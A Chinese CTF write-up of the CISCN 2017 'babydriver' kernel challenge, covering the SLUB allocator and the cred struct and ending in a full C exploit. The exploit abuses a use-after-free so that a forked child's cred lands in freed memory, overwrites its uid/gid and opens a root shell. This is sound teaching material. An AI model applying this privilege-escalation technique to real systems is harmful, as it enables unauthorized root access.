因为课程作业里接触到了uaf的kernel pwn，虽然比较基础，但是还是有那么点基础，理解起来不会很吃力。这次复现的是CISCN 2017的一个kernel pwn babydriver，比较简单的UAF，但是还是有一些细节知识值得学习。

相关知识点

slub分配器

先贴张图:

简单地了解一下内核内存管理的一些简单的特点，至于更深入的代码细节可以参考”Kernel Pwn 学习之路”系列文章。

与glibc中的malloc有点相同的是，kmalloc同样需要对齐到某些特定的大小，只不过这个范围更加特殊。通过sudo cat /proc/slabinfo | grep "^kmalloc"查看可以分配的object大小。

kmalloc-8192         479    500   8192    4    8 : tunables    0    0    0 : slabdata    125    125      0
kmalloc-4096        1356   1384   4096    8    8 : tunables    0    0    0 : slabdata    173    173      0
kmalloc-2048        2322   2368   2048   16    8 : tunables    0    0    0 : slabdata    148    148      0
kmalloc-1024        6702   6720   1024   32    8 : tunables    0    0    0 : slabdata    210    210      0
kmalloc-512        30090  30464    512   64    8 : tunables    0    0    0 : slabdata    476    476      0
kmalloc-256       187245 187328    256   64    4 : tunables    0    0    0 : slabdata   2927   2927      0
kmalloc-192         5858   6174    192   42    2 : tunables    0    0    0 : slabdata    147    147      0
kmalloc-128         3304   3904    128   64    2 : tunables    0    0    0 : slabdata     61     61      0
kmalloc-96        193746 193746     96   42    1 : tunables    0    0    0 : slabdata   4613   4613      0
kmalloc-64         54702  85696     64   64    1 : tunables    0    0    0 : slabdata   1339   1339      0
kmalloc-32         14245  15744     32  128    1 : tunables    0    0    0 : slabdata    123    123      0
kmalloc-16         15616  15616     16  256    1 : tunables    0    0    0 : slabdata     61     61      0
kmalloc-8          16384  16384      8  512    1 : tunables    0    0    0 : slabdata     32     32      0

因此当需要分配一块内存的时候，chunk的大小会向上对齐到满足需求的最小的那个object size。

一般来说，kmalloc分配出来的chunk在物理地址上都是连续的，（有时会出现第一个chunk不连续的情况）。也就是说slub分配器中维护的freelist，存放一个单向链表，这个链表将该slub中空闲的object串起来，通过设置object首8 bytes（x86为4 bytes）为下一个object的指针来实现。当有chunk被kfree掉时，会相应的放在对应size的freelist头部。至于关于object的其他的各种metadata，都会维护在相应的结构体中，这里不进行深入分析。
同glibc的malloc类似，kmalloc也不会清空chunk中的原有数据。

cred结构体

linux-4.4.72的cred结构体的定义如下（其中atomic_t，kuid_t，kgid_t都是4 bytes的数据类型）：

struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC  0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
    kuid_t      uid;        /* real UID of the task */
    kgid_t      gid;        /* real GID of the task */
    kuid_t      suid;       /* saved UID of the task */
    kgid_t      sgid;       /* saved GID of the task */
    kuid_t      euid;       /* effective UID of the task */
    kgid_t      egid;       /* effective GID of the task */
    kuid_t      fsuid;      /* UID for VFS ops */
    kgid_t      fsgid;      /* GID for VFS ops */
    unsigned    securebits; /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;  /* caps we're permitted */
    kernel_cap_t    cap_effective;  /* caps we can actually use */
    kernel_cap_t    cap_bset;   /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char   jit_keyring;    /* default keyring to attach requested
                     * keys to */
    struct key __rcu *session_keyring; /* keyring inherited over fork */
    struct key  *process_keyring; /* keyring private to this process */
    struct key  *thread_keyring; /* keyring private to this thread */
    struct key  *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void        *security;  /* subjective LSM security */
#endif
    struct user_struct *user;   /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;  /* supplementary groups for euid/fsgid */
    struct rcu_head rcu;        /* RCU deletion hook */
};

cred结构体的作用是储存某个进程的相关信息，标志它的权限，故如果修改了进程对应的cred结构体，也就修改了这个进程的权限。

因此只要将进程的uid和gid改为0，就能达到提权的目的。

此外由于cred结构体在不同版本的kernel里，大小可能不尽相同，如果直接看源码计算它的大小可能不太方便，因此可以通过：

修改文件系统镜像rootfs.cpio解包出的init，将setgiduid的命令，例如：
1
setsid cttyhack setuidgid 1000 sh
修改为root用户:
1
setsid cttyhack setuidgid 0 sh
这样内核启动完，就能以root的身份登录。

编写获取cred结构体大小的简单模块，打包进文件系统镜像中，如：

// Use for get struct cred size
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/cred.h>

struct cred c;

static int get_cred_size_init(void)
{
    printk(KERN_INFO "[!] Start!\n");
    printk(KERN_INFO "[+] Size of cred struct: %lx\n", sizeof(c));
    return 0;
}

static void get_cred_size_exit(void)
{
    printk(KERN_INFO "[!] Exit!\n");
}

module_init(get_cred_size_init);
module_exit(get_cred_size_exit);
MODULE_LICENSE("GPL");

这样在目标系统启动后，插入模块就能获得cred结构体的大小。

fork

对于一个进程fork出来的子进程，由于最开始子进程会和父进程共享内存空间，只有内存中的信息要发生变化的时候，才会分配出相应的内存。因此如果父进程释放一个与cred结构体大小相同的chunk，子进程在创建自己的cred结构体的时候，会从释放的chunk中拿到内存空间，这就促使了uaf的利用。

ciscn 2017 babydriver复现

题目分析

查看保护机制：

Arch:     amd64-64-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x0)

同时从boot.sh中，查看qemu的参数，开启了smep：

1	-cpu kvm64,+smep

ioctl只提供了一个kmalloc的功能，为全局变量babydev_struct结构体的成员变量device_buf分配空间（事先会调用kfree先释放空间），其中size可控：

// local variable allocation has failed, the output may be wrong!
__int64 __fastcall babyioctl(file *filp, unsigned int command, unsigned __int64 arg)
{
    size_t v3; // rdx
    size_t v4; // rbx
    __int64 result; // rax

    _fentry__(filp, *(_QWORD *)&command);
    v4 = v3;
    if ( command == 0x10001 )
    {
        kfree(babydev_struct.device_buf);
        babydev_struct.device_buf = (char *)_kmalloc(v4, 0x24000C0LL);
        babydev_struct.device_buf_len = v4;
        printk("alloc done\n", 0x24000C0LL);
        result = 0LL;
    }
    else
    {
        printk(&unk_2EB, v3);
        result = 0xFFFFFFFFFFFFFFEALL;
    }
    return result;
}

close的回调函数babyrelease通过kfree释放了babydev_struct->device_buf的空间：

int __fastcall babyrelease(inode *inode, file *filp)
{
    _fentry__(inode, filp);
    kfree(babydev_struct.device_buf);
    printk("device release\n", filp);
    return 0;
}

read的回调函数babyread读取babydev_struct->device_buf的内容：

ssize_t __fastcall babyread(file *filp, char *buffer, size_t length, loff_t *offset)
{
    size_t v4; // rdx
    ssize_t result; // rax
    ssize_t v6; // rbx

    _fentry__(filp, buffer);
    if ( !babydev_struct.device_buf )
        return -1LL;
    result = -2LL;
    if ( babydev_struct.device_buf_len > v4 )
    {
        v6 = v4;
        copy_to_user(buffer, babydev_struct.device_buf, v4);
        result = v6;
    }
    return result;
}

write的回调函数babywrite向babydev_struct->device_buf写入数据，size可控：

ssize_t __fastcall babywrite(file *filp, const char *buffer, size_t length, loff_t *offset)
{
    size_t v4; // rdx
    ssize_t result; // rax
    ssize_t v6; // rbx

    _fentry__(filp, buffer);
    if ( !babydev_struct.device_buf )
        return -1LL;
    result = -2LL;
    if ( babydev_struct.device_buf_len > v4 )
    {
        v6 = v4;
        copy_from_user(babydev_struct.device_buf, (char *)buffer, v4);
        result = v6;
    }
    return result;
}

利用思路

结构体babydev_struct是全局变量，因此如果开启两个设备，第二个设备kmalloc出的babydev_struct->device_buf指针会会覆盖掉第一个设备的babydev_struct->device_buf（因为实际上是同一个）。因此如果close第二个设备，触发kfree操作释放掉babydev_struct->device_buf但是没有清空指针，就会造成uaf漏洞，因为此时第一个设备仍然可以操作babydev_struct->device_buf变量。
利用ioctl控制babydev_struct->device_buf的size为0xA8(sizeof(struct cred))，使得close第二个设备的时候释放一个size=0xC0的chunk到slub中。
fork一个子进程，由于子进程创建的cred结构体会从上述释放的0xC0的chunk中获得，所以第一个设备的babydev_struct->device_buf和子进程的cred同时指向一个chunk。
在子进程中调用第一个设备的write，将子进程的cred结构体中的uid和gid改为0，完成提权。
在子进程开启shell，get root shell。

exp

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stropts.h>
#include <sys/wait.h>
#include <sys/stat.h>

#define COM_MALLOC 0x10001

int main(void)
{
    int fd_1, fd_2;
    int child;
    char payload[16];
    
    // open the device twice
    fd_1 = open("/dev/babydev", O_RDWR);
    fd_2 = open("/dev/babydev", O_RDWR);

    // malloc a chunk with sizeof(struct cred)
    ioctl(fd_1, COM_MALLOC, 0xA8);

    // free the chunk
    close(fd_1);

    // fork a child process
    // the cred structure of the child process will take space from the chunk just freed
    child = fork();

    // if error
    if(child < 0)
    {
        printf("[!] Fork error!\n");
        return 0;
    }

    // child process
    else if(child == 0)
    {
        memset(payload, 0, sizeof(payload));
        write(fd_2, payload, sizeof(payload));

        if(getuid() == 0)
        {
            printf("[+] Root!\n");
            system("/bin/sh");

            return 0;
        }
    }

    // parent process
    else
    {
        wait(NULL);
    }

    close(fd_2);

    return 0;
}

小结

与glibc的uaf利用基本类似，只不过因为是kernel pwn，要具有多线程的思维，这点很重要，因为许多情况在单线程思维的角度中是不会发生的，但是多线程下却是可能的。
相比于调用commit_creds(prepare_kernel_cred(0));的函数调用的提权方式，直接修改cred结构体提权显得简单粗暴。
这道babydriver的题似乎还有rop绕过smep的做法，后面浮现后，会补充在上篇ROP的文章里。